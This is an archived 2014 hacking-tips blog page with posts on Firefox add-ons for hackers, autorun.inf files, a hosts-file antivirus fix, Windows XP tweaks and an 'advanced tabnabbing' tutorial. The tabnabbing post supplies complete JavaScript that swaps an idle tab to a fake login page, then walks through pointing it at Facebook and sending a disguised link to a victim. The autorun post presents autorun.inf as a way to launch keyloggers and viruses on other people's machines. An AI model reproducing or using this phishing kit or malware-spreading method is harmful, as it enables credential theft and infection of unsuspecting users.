Tips and Tricks By Akash: February 2014

Friday 28 February 2014

11 FIREFOX ADDONS A HACKER MUST HAVE AND USE

Firefox is one the most secured web browser in the world. Have you ever dreamed of that we can use Firefox to Hack like a pro? Firefox like other browsers has a feature called add-on. Add-ons adds an additional functionality to your Firefox browser. There are thousands of Firefox add-ons available for Mozilla but Hackingloops brings you the best and most effectiveHacking add-ons ever on Firefox. In short, we are listing a most popular and interesting Firefox add-ons that are useful for Hackers. This list of 11 add-ons vary from information gathering tools to attacking tools. All these add-ons are available for free and you can download from theMozilla add-on website. So friends lets see what Hackingloops has bring this time for you. I will list them in way from top( I like most) to bottom pattern but note that all of them are extremely good tools.

Firefox Add-ons for Hackers

11 Firefox Add-ons a Hacker Must Have and use

1. Tamper Data
Tamper data is an great tool to to view and modify HTTP/HTTPS headers and post parameters. We can alter each request going from our machine to destination host with this. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.
Add Tamper data to Firefox:
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

2. Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.
Add firebug to your browser :
https://addons.mozilla.org/en-US/firefox/addon/firebug/

3. Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.
Add Hackbar to Firefox:
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

4. Cookies Manager +
Cookie Manager is one of the greatest tool ever made. Using this tool you can actually play with cookies. You can alter almost all cookie using this tool. You can use Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.
Add Cookies Manager to Firefox:
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

5. NoScript
No Script add-ons greatness is beyond imagination. With this tool you can monitor each an every script running on website, you can block any of scripts and see what actually that scripts does on website. But this add-on is for experts, newbies will face problems using this. Note: If you are testing XSS, HTTPS header modifications, Injection attacks on any website you need to disable this plugin because it will not allow you to do so.
Add NoScript to Firefox:
https://addons.mozilla.org/en-us/firefox/addon/noscript/

6. Grease Monkey
Grease Monkey is an counter part of No Script, its actually behaves opposite of Noscript. We use Noscript to block the scripts and use GreaseMonkey to run the scripts. It allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.
Add Grease Monkey to Firefox :
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

7. User Agent Switcher
User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attack.
Add user agent Switcher to Firefox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

8. CryptoFox
CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.
Add CryptoFox to Firefox:
https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

9. SQL Inject Me
SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. Hackers can use this tool for SQL injection testing.
Add SQL Inject Me to Firefox:
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

10. XSS ME
Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.
Add XSS ME to Firefox:
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

11. Passive Recon
Last but not the least. Passive recon is a good information gathering tool.
PassiveRecon provides information security professionals with the ability to perform "packetless" discovery of target resources utilizing publicly available information. It gathers information like DnsStuff tool available on backtrack.
Add Passive Recon to Firefox:
https://addons.mozilla.org/en-US/firefox/addon/passiverecon/

That's all for today guys, i hope you all are enjoying your journey towards becoming a Professional Hacker. Have fun! Keep Learning

HOW TO CREATE AUTORUN FILE FOR PENDRIVES OR USB DRIVES

Hey Friends, today i am going to teach you "How to create a Autorun.inf file for USB drives or simply CD drives" so that it can execute programs. Programs can be viruses, keyloggers, rats or simply normal services that you want to execute automatically whenever user open his/her pendrive or USB drive. Its the easiest way to spread your programs to schedule, so that they can execute by itself without any user interaction.

Creating a simple or complex autorun file for your pendrive or USB drive.

Note: You can also follow these instructions when making a CD. You just have to burn it on the cd.

create autorun file for Usb drives or pendrives

Creating Autorun.inf file for executing keyloggers or viruses

When you plug a USB or pen drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.

This autorun can be used for good things and also for bad things depending on what you like. I am Destructive Mind, so i use it to run my coded viruses and keyloggers to execute automatically by themselves as soon as user open folder or simply opens pen drive or usb drive.

This tutorial covers:

Creating a USB Autorun.inf
Changing label\icon of thumbdrive
Making a new option appear in the autorun menu
Making programs automatically run when plugged in

So Read On How to create Autorun.inf file...

Creating a USB Autorun.inf :

To create an autorun file, open Notepad and save ‘autorun.inf’’ (with quotes) and save it to the root of the drive. All it needs to have is in the first line;

[autorun]

Changing label\icon of thumbdrive:

Follow the steps in Creating a USB Autorun.inf. Before you save it, type this in in this order!

[autorun]

icon=myicon.ico

label=MyLabel

And save. Make sure the icon file is in the root of your drive.

Making a new option appear in the autorun menu:

Right, so make your autorun file and type this into Notepad:

[autorun]

icon=default

label=[yourlabelhere]

action=programname.exe

Open Program

Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.

Making programs automatically run when the USB is plugged in:

Follow the same instructions, blah blah blah;

[autorun]

Icon=default

label=YourLabelHere

open=programname.exe

And that’s it for this tutorial! Your Autorun program is ready to execute whatever you want. Here i have written to execute a simple program called programname.exe

If you have any questions or queries, ask in form of comments. If you like my articles just a comment of appreciation will do the thing.

SOLUTION OR FIX NOT ABLE TO INSTALL ANTIVIRUS PROBLEM

Many friends and other internet users has reported me a problem that they are Not able to Install any Antivirus on their computer or Laptop. Most users informed me that their system is infected by viruses and they are not able to remove the viruses or keyloggers from their system as their antivirus is not downloading any new updates and also they are not able to install any new antivirus or other security related software's. So friends, i come up with the solution or fix of the above mentioned problem. Let's first understand the concept why this type of problem generally arises, as we are not normal users, we are Geeks and Elite Ethical Hackers and for us learning new things is always the key to success.

Nowadays viruses not only infect the exe(executables) files or dll(dynamic link library) files but Hackers who code viruses became more smart and they started concatenating and modifying the configuration files of windows like ini files, host files, log files etc. Now what they do they add their own configurations to your system files which make your system vulnerable to hackers, so that they can exploit it easily. Recently hackers have started modifying the host file in windows. Host file is actually used to map any ip address with website name. Host file is also used to block any website, so that user or any application cannot access that website. Forblocking any website, what hackers do is that they map localhost IP addess with any website. Hence, whenever user or any application tries to access any website, it translates website IP address to localhost address which is usually 127.0.0.1 . This technique is known as back looping. Back Looping means your web browser will search the particular website address into your localhost and when it doesn't find it there( off course it will not find it) its shows page not found. So what hackers do, they add all the antivirus websites and their update servers to host file and bind their IP address with localhost IP(i.e. 127.0.0.1), so when your antivirus tries to update or install, it doesn't find the antivirus server and hence update fails. So friends how to fix this issue or problem. Here are the steps to fix the "Not able to install any Antivirus" or "Not able to update antivirus" problem.

Steps to Fix Not able to Install Any Antivirus or Update Antivirus:

1. Disconnect the internet.

2. Open the host file at below location:

C:\Windows\System32\drivers\etc

For windows XP, you can directly open host file with notepad and edit it.

For windows vista or windows 7, first of all you need to provide the file editing rights or privileges to edit host file. This can be done by right clicking on host file and going to security tab and their you will see one advance tab.
In that window, you will see users(useraccount name), select the users and click on change permission now again select the users and double click on it.
And there just click on the Full Control checkbox and then click on apply. Now you will be able to edit the host file in the windows 7 or vista.

3. Now when your system is infected, you will see some website names mapped against the IP address 127.0.0.1 , what this is doing is that blocking you and your system applications to access these websites.

4. Now to fix not able to install any antivirus or install antivirus updates problem, you need to remove all the entries from the host file.

5. Entries can be removed by two ways:
a. Just by deleting everything from host file.
b. Simply putting # in front of the 127.0.0.1 on each line. This will comment that part. So it will not execute.

6. Now just save the host file and you are done.

7. Now install your antivirus or try to update your antivirus. It will work.

8. That's all my friends. Now after installing antivirus just run the scan and remove all the viruses.
Note: This problem actually occurs due to W32/sality worm and new keyloggers or trojans.

I hope you all have enjoyed the article and able to understand the new concept.
If you have any doubts or queries ask in form of comments.

HOW TO INCREASE OR BOOST SYSTEM OR PC SPEED TO MAXIMUM

Hello friends, today i will share with you a collection of windows tweaks that will help you to achieve maximum system or PC speed. All want that their system will work as fast as possible so why always settle for normal things, now you are learning hacking and still using your PC or system like noobs or novice guys that really not fair. So lets spend 5 minutes and get best available throughput from your Operating system. Lets start that how to increase or boost your system or PC speed to new heights..

speed up system or PC,speed browsing speed

How to Increase or boost system or PC speed to maximum

In this article i will share the following tricks to increase system speed:
1. Disable Autorun from all drives.
2. Speed Up Browsing speed (explore optimization).
3. Disable Indexing services.
4. Optimize Display Settings.
5. Speed up folder browsing.
6. Disable Unnecessary Services.
7. Remove annoying delete confirmation messages.

Disable Autorun from all drives
1. Go to START menu then go to RUN and type "gpedit.msc" (without quotes) and press enter.
2. Now here you will see two things first is Computer configuration and second is user configuration, you to go to both one by one.
3. First go to Computer Configuration then Go to Administrative Templates and then to System.
4. Now find the Key "Turn off Autoplay". Double click on it. Now click on Enable and select all drive and click on apply. So for computer its done, now you need to do for your own Account.
5. Second go to User Configuration --: Administrative Templates --: System --: And repeat the 4th step again.

This will disable all the auto run from your system and also help you to prevent from USB and pen drive viruses.

Speed Up Browsing speed (explore optimization)
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.

Disable Indexing services
Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services and click on next.

Optimize Display settings
Windows XP can look sexy but displaying all the visual items can waste system resources.
To optimize:
1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
        - Show shadows under menus
        - Show shadows under mouse pointer
        - Show translucent selection rectangle
        - Use drop shadows for icons labels on the desktop
        - Use visual styles on windows and button.

Speed up Folder Browsing
This one is already covered by windows SP2 and SP3. But still i will share.
You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:

1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer

Disable Unnecessary Services
Because Windows XP has to be all things to all people it has many services running that take up system resources that you will never need. Below is a list of services that can be disabled on most machines:

Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation

To disable these services:
Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable".

Remove Annoying Delete Confirmation message
Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:
1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'
2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'

If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle Bin and 'Restore' the file.

Thats all friends, now you have a smart PC with maximum acheived speed without altering RAM or other stuff.

If you have any queries ask me in form of comments. I hope you all have enjoyed the topic...

FIX WINDOWS XP AFTER VIRUS ATTACK

Hello guys , as we all know nowadays virus attacks are very common and we have to have lot of problems because of viruses like task manager does not opens,folder options missing, registry has been disabled by administrator,cannot find dll and so on. These are very common problems and can happen with any of us so we must know to fix these problems without formatting your windows XP. Most of the virus infects your basic programs i.e task manager,registry,group policy editor,boot up,folder properties etc. Today i will tell how to Fix windows Xp after virus attack in this article. So guys read on...

There are several free tool in the market that can help you to fix your windows xp after virus attacks but i always come with complete package. Don't worry friends its also a free tool but using this you can recover almost every windows services and functionality within few seconds and that's also without formatting. Why i am telling all this is because we must know how to recover along with how to hack and hacking...

The features of the tool that i have discussed above is called QUICK FIX.

Quick fix is really an outstanding tool. Its an complete solution of a to z windows XP problems. You can recover back from all types of virus attacks using this tool.

Below are some Important Features:

1. Enable Task Manager

2. Enable Registry

3. Enable Folder Options

4. Restore missing run dialog

5. Enable Command Prompt(cmd)

6. Stop My Documents to open at start up

7. Restore Device manager.

8. Fix Delay at start up.

9 Fix Recovery Console

and much more....

So Guys why are you waiting Download Quick Fix and Fix your windows problems wasily in a single click..

DOWNLOAD QUICK FIX:

MEDIAFIRE

I hope you all have liked this... If you have any queries ask me.

ADVANCED TABNABBING TUTORIAL

I will explain this tutorial using attack scenario and live example and how to protect yourself from such stuff.

Let consider a attack scenario:

1. A hacker say(me Akash) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)

2. I (Akash) sends a copy of this web page to victim whose account or whatever i want to hack.

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.

Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:

1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..